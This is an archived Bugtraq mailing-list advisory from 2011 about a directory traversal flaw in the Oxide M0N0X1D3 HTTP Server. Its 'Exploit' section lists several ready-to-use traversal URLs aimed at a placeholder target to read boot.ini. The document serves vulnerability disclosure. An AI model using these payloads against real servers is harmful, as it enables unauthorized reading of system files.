[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Oxide M0N0X1D3 HTTP Server Directory Traversal Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Oxide M0N0X1D3 HTTP Server Directory Traversal Vulnerability
From: demonalex@xxxxxxx
Date: Tue, 29 Nov 2011 11:16:16 GMT

Title : Oxide M0N0X1D3 HTTP Server Directory Traversal Vulnerability
Software : Oxide M0N0X1D3 HTTP Server
Software Version : 20040223
Vendor: http://sourceforge.net/projects/oxide-ws/ 
Vulnerability Published : 2011-11-15
Vulnerability Update Time :
Status : 
Impact : Medium
Bug Description :
Oxide M0N0X1D3 HTTP Server does not properly sanitise filenames containing 
directory traversal sequences that are received from an HTTP Browser.
Exploit :
****************************************************************
http://target/..\..\..\boot.ini
http://target/..\\..\\..\\boot.ini
http://target/..\/..\/..\/boot.ini
http://target//..\/..\/..\boot.ini
http://target/.\..\.\..\.\..\boot.ini
..
****************************************************************
Credits : This vulnerability was discovered by demonalex(at)163(dot)com
Pentester/Researcher
Dark2S Security Team/PolyU.HK

Prev by Date: Security-Assessment.com Release: Hacking Hollywood Slides, Advisories and Exploits
Next by Date: Re: Re: wordpress Lanoba Social Plugin Xss Vulnerabilities
Previous by thread: Security-Assessment.com Release: Hacking Hollywood Slides, Advisories and Exploits
Next by thread: Re: Re: wordpress Lanoba Social Plugin Xss Vulnerabilities
Index(es):
- Date
- Thread